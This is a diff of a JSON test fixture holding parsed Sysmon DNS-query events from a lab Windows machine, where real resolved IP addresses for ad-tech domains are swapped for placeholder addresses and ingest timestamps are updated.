@@ -17851,15 +17637,15 @@ }, "answers": [ { - "data": "54.243.145.203", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.221.211.153", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17867,7 +17653,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -17875,7 +17661,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -17883,7 +17669,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -17891,7 +17677,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -17900,17 +17686,17 @@ } ], "resolved_ip": [ - "54.243.145.203", - "54.221.211.153", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, 
@@ -17926,24 +17712,23 @@ "sync.jivox.com" ], "ip": [ - "54.243.145.203", - "54.221.211.153", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742474700Z", + "ingested": "2021-12-09T13:50:23.457563100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067797800Z'/\u003e\u003cEventRecordID\u003e195\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.jivox.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:54.243.145.203;::ffff:54.221.211.153;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067797800Z'/\u003e\u003cEventRecordID\u003e195\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.jivox.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -18007,51 +17792,51 @@ "type": "CNAME" }, { - "data": "207.244.121.25", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.0.1", + "data": "89.160.20.156", "type": "A" }, { - "data": "162.210.196.115", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.94.20", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.0.12", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.65", + "data": "89.160.20.156", "type": "A" }, { - "data": "162.210.199.69", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.76.83", + "data": "89.160.20.156", "type": "A" }, { - "data": "162.210.197.137", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.108.217", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.137", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.67.99", + "data": "89.160.20.156", "type": "A" }, { 
@@ -18063,79 +17848,79 @@ "type": "A" }, { - "data": "108.59.4.172", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.62.117.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.4.171", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.27", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.71.67", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.70", + "data": "89.160.20.156", "type": "A" }, { - "data": "199.58.84.25", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.67.98", + "data": "89.160.20.156", "type": "A" }, { - "data": "162.210.196.116", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.73.10", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.110.3", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.4.173", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.0.8", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.71.88", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.73", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.69.231", + "data": "89.160.20.156", "type": "A" }, { - "data": "108.59.0.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "207.244.121.74", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -18143,7 +17928,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -18151,7 +17936,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -18159,7 +17944,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -18167,7 +17952,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -18175,7 +17960,7 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" }, { 
@@ -18183,7 +17968,7 @@ "type": "AAAA" }, { - "data": "192.42.93.30", + "data": "192.168.93.30", "type": "A" }, { @@ -18191,7 +17976,7 @@ "type": "AAAA" }, { - "data": "192.54.112.30", + "data": "192.168.112.30", "type": "A" }, { @@ -18199,7 +17984,7 @@ "type": "AAAA" }, { - "data": "192.43.172.30", + "data": "192.168.172.30", "type": "A" }, { @@ -18207,7 +17992,7 @@ "type": "AAAA" }, { - "data": "192.48.79.30", + "data": "192.168.79.30", "type": "A" }, { 
@@ -18216,57 +18001,57 @@ } ], "resolved_ip": [ - "207.244.121.25", - "108.59.0.1", - "162.210.196.115", - "207.244.94.20", - "108.59.0.12", - "207.244.121.65", - "162.210.199.69", - "207.244.76.83", - "162.210.197.137", - "207.244.108.217", - "207.244.121.137", - "207.244.67.99", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", "198.7.56.229", "198.7.56.231", - "108.59.4.172", - "108.62.117.43", - "108.59.4.171", - "207.244.121.27", - "207.244.71.67", - "207.244.121.70", - "199.58.84.25", - "207.244.67.98", - "162.210.196.116", - "207.244.73.10", - "207.244.110.3", - "108.59.4.173", - "108.59.0.8", - "207.244.71.88", - "207.244.121.73", - "207.244.69.231", - "108.59.0.2", - "207.244.121.74", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30", + "192.168.51.30", "2001:503:d414::30", - "192.42.93.30", + "192.168.93.30", "2001:503:eea3::30", - "192.54.112.30", + "192.168.112.30", "2001:502:8cc::30", - "192.43.172.30", + "192.168.172.30", "2001:503:39c1::30", - "192.48.79.30", + "192.168.79.30", "2001:502:7094::30" ] }, 
@@ -18283,64 +18068,35 @@ "b1sync.zemanta.com" ], "ip": [ - "207.244.121.25", - "108.59.0.1", - "162.210.196.115", - "207.244.94.20", - "108.59.0.12", - "207.244.121.65", - "162.210.199.69", - "207.244.76.83", - "162.210.197.137", - "207.244.108.217", - "207.244.121.137", - "207.244.67.99", + "89.160.20.156", "198.7.56.229", "198.7.56.231", - "108.59.4.172", - "108.62.117.43", - "108.59.4.171", - "207.244.121.27", - "207.244.71.67", - "207.244.121.70", - "199.58.84.25", - "207.244.67.98", - "162.210.196.116", - "207.244.73.10", - "207.244.110.3", - "108.59.4.173", - "108.59.0.8", - "207.244.71.88", - "207.244.121.73", - "207.244.69.231", - "108.59.0.2", - "207.244.121.74", - "192.5.6.30", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30", + "192.168.51.30", "2001:503:d414::30", - "192.42.93.30", + "192.168.93.30", "2001:503:eea3::30", - "192.54.112.30", + "192.168.112.30", "2001:502:8cc::30", - "192.43.172.30", + "192.168.172.30", "2001:503:39c1::30", - "192.48.79.30", + "192.168.79.30", "2001:502:7094::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742483100Z", + "ingested": "2021-12-09T13:50:23.457569Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated 
SystemTime='2019-07-18T03:34:09.067819600Z'/\u003e\u003cEventRecordID\u003e196\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.594\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb1sync.zemanta.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b1-lsw-use1.zemanta.com;::ffff:207.244.121.25;::ffff:108.59.0.1;::ffff:162.210.196.115;::ffff:207.244.94.20;::ffff:108.59.0.12;::ffff:207.244.121.65;::ffff:162.210.199.69;::ffff:207.244.76.83;::ffff:162.210.197.137;::ffff:207.244.108.217;::ffff:207.244.121.137;::ffff:207.244.67.99;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:108.59.4.172;::ffff:108.62.117.43;::ffff:108.59.4.171;::ffff:207.244.121.27;::ffff:207.244.71.67;::ffff:207.244.121.70;::ffff:199.58.84.25;::ffff:207.244.67.98;::ffff:162.210.196.116;::ffff:207.244.73.10;::ffff:207.244.110.3;::ffff:108.59.4.173;::ffff:108.59.0.8;::ffff:207.244.71.88;::ffff:207.244.121.73;::ffff:207.244.69.231;::ffff:108.59.0.2;::ffff:207.244.121.74;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;2001:503:d414::30;192.42.93.30;2001:503:eea3::30;192.54.112.30;2001:502:8cc::30;192.43.172.30;2001:503:39c1::30;192.48.79.30;2001:502:7094::30;192.5\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + 
"original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067819600Z'/\u003e\u003cEventRecordID\u003e196\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.594\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb1sync.zemanta.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
b1-lsw-use1.zemanta.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;2001:503:d414::30;192.168.93.30;2001:503:eea3::30;192.168.112.30;2001:502:8cc::30;192.168.172.30;2001:503:39c1::30;192.168.79.30;2001:502:7094::30;192.5\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", 
@@ -18404,55 +18160,55 @@ "type": "CNAME" }, { - "data": "124.146.215.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.53", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.46", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.52", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.48", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.45", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.54", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.47", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.42", + "data": "89.160.20.156", "type": "A" }, { - "data": "124.146.215.44", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.55", + "data": "89.160.20.156", "type": "A" }, { - "data": "202.241.208.56", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -18461,19 +18217,19 @@ } ], "resolved_ip": [ - "124.146.215.43", - "202.241.208.53", - "124.146.215.46", - "202.241.208.52", - "124.146.215.48", - "124.146.215.45", - "202.241.208.54", - "124.146.215.47", - "124.146.215.42", - "124.146.215.44", - "202.241.208.55", - "202.241.208.56", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, 
@@ -18490,26 +18246,15 @@ "tg.socdm.com" ], "ip": [ - "124.146.215.43", - "202.241.208.53", - "124.146.215.46", - "202.241.208.52", - "124.146.215.48", - "124.146.215.45", - "202.241.208.54", - "124.146.215.47", - "124.146.215.42", - "124.146.215.44", - "202.241.208.55", - "202.241.208.56", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742491500Z", + "ingested": "2021-12-09T13:50:23.457574800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067835500Z'/\u003e\u003cEventRecordID\u003e197\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.619\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etg.socdm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
tg3.dr.socdm.com;::ffff:124.146.215.43;::ffff:202.241.208.53;::ffff:124.146.215.46;::ffff:202.241.208.52;::ffff:124.146.215.48;::ffff:124.146.215.45;::ffff:202.241.208.54;::ffff:124.146.215.47;::ffff:124.146.215.42;::ffff:124.146.215.44;::ffff:202.241.208.55;::ffff:202.241.208.56;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067835500Z'/\u003e\u003cEventRecordID\u003e197\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.619\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etg.socdm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
tg3.dr.socdm.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -18580,12 +18325,12 @@ "type": "CNAME" }, { - "data": "68.67.153.75", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "68.67.153.75" + "89.160.20.156" ] }, "network": { 
@@ -18601,13 +18346,13 @@ "prebid.adnxs.com" ], "ip": [ - "68.67.153.75" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742499900Z", + "ingested": "2021-12-09T13:50:23.457580700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067845000Z'/\u003e\u003cEventRecordID\u003e198\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.620\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprebid.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prebid.appnexusgslb.net;::ffff:68.67.153.75;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067845000Z'/\u003e\u003cEventRecordID\u003e198\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.620\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprebid.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prebid.appnexusgslb.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -18679,12 +18424,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { 
